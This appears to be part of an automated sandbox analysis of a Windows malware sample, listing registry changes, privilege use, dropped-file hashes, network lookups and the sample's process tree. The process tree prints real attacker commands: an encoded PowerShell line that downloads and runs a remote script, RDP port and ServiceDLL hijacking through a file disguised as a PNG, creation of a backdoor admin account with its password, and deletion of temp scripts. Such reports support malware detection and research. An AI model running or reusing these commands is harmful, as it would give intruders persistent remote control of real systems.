| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\icacls.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe
"C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ax243g2c\ax243g2c.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4C1D.tmp" "c:\Users\Admin\AppData\Local\Temp\ax243g2c\CSCF44B0B12EDA144EC9791879C166FE881.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 3ybcpC4v /add
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 3ybcpC4v /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 3ybcpC4v /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 3ybcpC4v
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 3ybcpC4v
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 3ybcpC4v
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 8.8.8.8:53 | pgf5ga4g4b.cn | udp |
| N/A | 8.8.8.8:53 | pgf5ga4g4b.cn | udp |
Files
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 3447df88de7128bdc34942334b2fab98 |
| SHA1 | 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb |
| SHA256 | 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9 |
| SHA512 | 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f |
memory/688-75-0x000000001B850000-0x000000001B851000-memory.dmp
memory/900-76-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\ax243g2c\ax243g2c.cmdline
| MD5 | 10c90815018c53533ad72acf995caf57 |
| SHA1 | bc4490bc1647955132a59d51aec5ac4600f35722 |
| SHA256 | d339ded9ad02ecaa1773f177c96ec91d63b28927cbe19bb005803190d3556938 |
| SHA512 | 10002de0b2dd9840af63fd3c7e5915cef8628e9c9a81c749c1d84d1684f161c567471d819fd2868eaad0e6bc19d4733037cd37c55198d1f5a0a5b62f51331eba |
\??\c:\Users\Admin\AppData\Local\Temp\ax243g2c\ax243g2c.0.cs
| MD5 | 4864fc038c0b4d61f508d402317c6e9a |
| SHA1 | 72171db3eea76ecff3f7f173b0de0d277b0fede7 |
| SHA256 | 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84 |
| SHA512 | 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31 |
memory/664-79-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\ax243g2c\CSCF44B0B12EDA144EC9791879C166FE881.TMP
| MD5 | ddfda59f555ca7b662250a1e564865eb |
| SHA1 | ab2a1fc13ad69390a27655f5e8554c97ba80cd6e |
| SHA256 | 2a892f84f57113dd6bd415277d0ca67206ada2579993d59fc45f6e55cdcb2301 |
| SHA512 | 545ef75525b459ee38308df256b3b7a56c5dbdb6219b2d4f42cb7e5fe1b6a94f16ee0ae8f398e026d83e52d2e77c62af5533dd65c69493fc287f1410cb8c8c3b |
C:\Users\Admin\AppData\Local\Temp\RES4C1D.tmp
| MD5 | a9630b1e4888d9578e687e6cf93bff25 |
| SHA1 | 0ba95823ca4d2f4af40317c14448cbd2f59e6e0f |
| SHA256 | 43301466c105903e4fbbd43969189ab1645ea42754ca5f673084a074dc49fe57 |
| SHA512 | 9e13401565b1631c3cd7672df49a70f23c9f2d9212bfd89e3ab747c40cfc6a2e7d8897159541eda89daf8a4a695a9e8835054bc0cab3200bf79f7b1394ea13f9 |
memory/688-83-0x0000000002470000-0x0000000002471000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ax243g2c\ax243g2c.dll
| MD5 | 6e8b670d36f0a8e688cc3c44850f1742 |
| SHA1 | 81d206954e9f9d16009e3eb35d219e9c58c0eaf4 |
| SHA256 | 4aaf6394105485f912c219bdf8a0128025a6521e2699184d62fc2ce5e108e402 |
| SHA512 | 61b4f12087184f35eece4ecffc4bf1a9c08ad3581b19b8e827ab764cfaf48326a2952beae9517b4c500ee7a32d307ef6ed6e0d41dc569ca73231d0a0641fce19 |
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
| MD5 | 43473f4e719958639a9d89e5d8388999 |
| SHA1 | ccb79eb606a23daa4b3ff8f996a2fbf281f31491 |
| SHA256 | ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734 |
| SHA512 | 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa |
memory/688-85-0x000000001C4B0000-0x000000001C4B1000-memory.dmp
memory/688-86-0x000000001C530000-0x000000001C531000-memory.dmp
memory/688-87-0x00000000026F0000-0x00000000026F1000-memory.dmp
memory/620-88-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 6c702b6817a23dc16c269caf6c004c27 |
| SHA1 | ada596f551643a76bb6a9b7835e4ee6fae56579d |
| SHA256 | ba0c315f9be1d48ad1b41bfffa8e006286c96fb18eec8d34fc5a06eefaaeb7f7 |
| SHA512 | 7098703839e37f5cdcbf642bbb883e4a60cc4c5079104f53b46ad5dda7222c2daee7822aa812cdc485eb6272361300d590ff0fcac2f9221b4730cd0a2a8c7c9e |
memory/620-93-0x000000001AB10000-0x000000001AB12000-memory.dmp
memory/620-94-0x000000001AB14000-0x000000001AB16000-memory.dmp
memory/620-96-0x0000000002490000-0x0000000002491000-memory.dmp
memory/620-98-0x000000001AA80000-0x000000001AA81000-memory.dmp
memory/620-100-0x000000001B500000-0x000000001B501000-memory.dmp
memory/620-101-0x0000000002320000-0x0000000002321000-memory.dmp
memory/688-102-0x000000001AC0A000-0x000000001AC29000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 8d0b889032668fe95ff82c113598b48a |
| SHA1 | 3843e6b889a3fcfb5cb2f376fb0e9a4f1e19f7e4 |
| SHA256 | 6b71f3673fae5a4e32778a803218eba6be52e8abd0787a8f598901782ad9a94a |
| SHA512 | ef7a28f3d49a904aecef86b7b2a3d19dd79d8c2424dc25dc5d77f261c52222abbb3d1b00d6d80426b22fefa4e63b4cc90b9e94f3ab780648015ddc2c892de49c |
memory/620-107-0x00000000027B0000-0x00000000027B1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_500f7fb7-43e4-458a-8ec7-ebb2718d02c8
| MD5 | 6f0d509e28be1af95ba237d4f43adab4 |
| SHA1 | c665febe79e435843553bee86a6cea731ce6c5e4 |
| SHA256 | f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e |
| SHA512 | 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797 |
memory/620-120-0x000000001B600000-0x000000001B601000-memory.dmp
memory/620-121-0x000000001B650000-0x000000001B651000-memory.dmp
memory/1644-122-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 6c702b6817a23dc16c269caf6c004c27 |
| SHA1 | ada596f551643a76bb6a9b7835e4ee6fae56579d |
| SHA256 | ba0c315f9be1d48ad1b41bfffa8e006286c96fb18eec8d34fc5a06eefaaeb7f7 |
| SHA512 | 7098703839e37f5cdcbf642bbb883e4a60cc4c5079104f53b46ad5dda7222c2daee7822aa812cdc485eb6272361300d590ff0fcac2f9221b4730cd0a2a8c7c9e |
memory/1644-128-0x000000001AB50000-0x000000001AB52000-memory.dmp
memory/1644-129-0x000000001AB54000-0x000000001AB56000-memory.dmp
memory/1644-130-0x0000000002580000-0x0000000002581000-memory.dmp
memory/1644-132-0x000000001B6F0000-0x000000001B6F1000-memory.dmp
memory/1644-134-0x0000000002650000-0x0000000002651000-memory.dmp
memory/1644-135-0x0000000002270000-0x0000000002271000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 623b241c8d3545ed375a4c3aea3dcfb1 |
| SHA1 | 03d87ac9a2e68757440246cdf44ba972a45364b0 |
| SHA256 | 3bc3ff1e1023c5c17522b9d7ac9b6e90ff80818f2ac83c5226cfc2436fe92bf0 |
| SHA512 | 41c62e3653f2914567fec7de08a733782c5022efd2defec5744dd9e7ec542fb74fa6ab31d475b27f023107ff35b55f4d264dbfc0ce511357a05210232ebeca80 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0bd867fe-ac26-484c-bd8d-cc45a7259d5d
| MD5 | 7f79b990cb5ed648f9e583fe35527aa7 |
| SHA1 | 71b177b48c8bd745ef02c2affad79ca222da7c33 |
| SHA256 | 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683 |
| SHA512 | 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f94c0498-03d8-4950-9bed-3f07909c50cf
| MD5 | e5b3ba61c3cf07deda462c9b27eb4166 |
| SHA1 | b324dad73048be6e27467315f82b7a5c1438a1f9 |
| SHA256 | b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925 |
| SHA512 | a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_71466070-c7f3-43bd-9dab-0ecdc6e40f09
| MD5 | d89968acfbd0cd60b51df04860d99896 |
| SHA1 | b3c29916ccb81ce98f95bbf3aa8a73de16298b29 |
| SHA256 | 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9 |
| SHA512 | b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a32fc2b7-d86f-42d5-85ba-df2eb2b6c251
| MD5 | 2d5cd190b5db0620cd62e3cd6ba1dcd3 |
| SHA1 | ff4f229f4fbacccdf11d98c04ba756bda80aac7a |
| SHA256 | ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d |
| SHA512 | edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a5f1357-d58c-4ebe-a68e-1f073e1d5d7c
| MD5 | faa37917b36371249ac9fcf93317bf97 |
| SHA1 | a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4 |
| SHA256 | b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132 |
| SHA512 | 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9b474b06-45ad-4408-b468-0cfcef08bb2a
| MD5 | a70ee38af4bb2b5ed3eeb7cbd1a12fa3 |
| SHA1 | 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9 |
| SHA256 | dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d |
| SHA512 | 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3 |
memory/1568-143-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 6c702b6817a23dc16c269caf6c004c27 |
| SHA1 | ada596f551643a76bb6a9b7835e4ee6fae56579d |
| SHA256 | ba0c315f9be1d48ad1b41bfffa8e006286c96fb18eec8d34fc5a06eefaaeb7f7 |
| SHA512 | 7098703839e37f5cdcbf642bbb883e4a60cc4c5079104f53b46ad5dda7222c2daee7822aa812cdc485eb6272361300d590ff0fcac2f9221b4730cd0a2a8c7c9e |
memory/1568-149-0x000000001AA40000-0x000000001AA42000-memory.dmp
memory/1568-150-0x000000001AA44000-0x000000001AA46000-memory.dmp
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/688-158-0x000000001C640000-0x000000001C641000-memory.dmp
memory/384-159-0x0000000000000000-mapping.dmp
C:\Windows\system32\rfxvmt.dll
| MD5 | dc39d23e4c0e681fad7a3e1342a2843c |
| SHA1 | 58fd7d50c2dca464a128f5e0435d6f0515e62073 |
| SHA256 | 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9 |
| SHA512 | 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7 |
memory/1584-161-0x0000000000000000-mapping.dmp
memory/272-162-0x0000000000000000-mapping.dmp
memory/1356-163-0x0000000000000000-mapping.dmp
memory/1732-164-0x0000000000000000-mapping.dmp
memory/1728-165-0x0000000000000000-mapping.dmp
memory/1724-166-0x0000000000000000-mapping.dmp
memory/588-167-0x0000000000000000-mapping.dmp
memory/1128-168-0x0000000000000000-mapping.dmp
memory/1972-169-0x0000000000000000-mapping.dmp
memory/676-170-0x0000000000000000-mapping.dmp
memory/1640-171-0x0000000000000000-mapping.dmp
memory/2036-172-0x0000000000000000-mapping.dmp
memory/1248-173-0x0000000000000000-mapping.dmp
memory/1176-174-0x0000000000000000-mapping.dmp
memory/2032-175-0x0000000000000000-mapping.dmp
memory/1156-176-0x0000000000000000-mapping.dmp
memory/596-177-0x0000000000000000-mapping.dmp
memory/572-178-0x0000000000000000-mapping.dmp
memory/1568-179-0x0000000000000000-mapping.dmp
memory/1924-180-0x0000000000000000-mapping.dmp
\Windows\Branding\mediasrv.png
| MD5 | 271eacd9c9ec8531912e043bc9c58a31 |
| SHA1 | c86e20c2a10fd5c5bae4910a73fd62008d41233b |
| SHA256 | 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934 |
| SHA512 | 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0 |
\Windows\Branding\mediasvc.png
| MD5 | 1fa9c1e185a51b6ed443dd782b880b0d |
| SHA1 | 50145abf336a196183882ef960d285bd77dd3490 |
| SHA256 | f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959 |
| SHA512 | 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc |
memory/1672-183-0x0000000000000000-mapping.dmp
memory/1728-184-0x0000000000000000-mapping.dmp
memory/340-185-0x0000000000000000-mapping.dmp
memory/620-186-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1900-188-0x0000000000000000-mapping.dmp
memory/1216-189-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/456-191-0x0000000000000000-mapping.dmp
memory/1564-192-0x0000000000000000-mapping.dmp
memory/1988-193-0x0000000000000000-mapping.dmp
memory/1972-194-0x0000000000000000-mapping.dmp
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
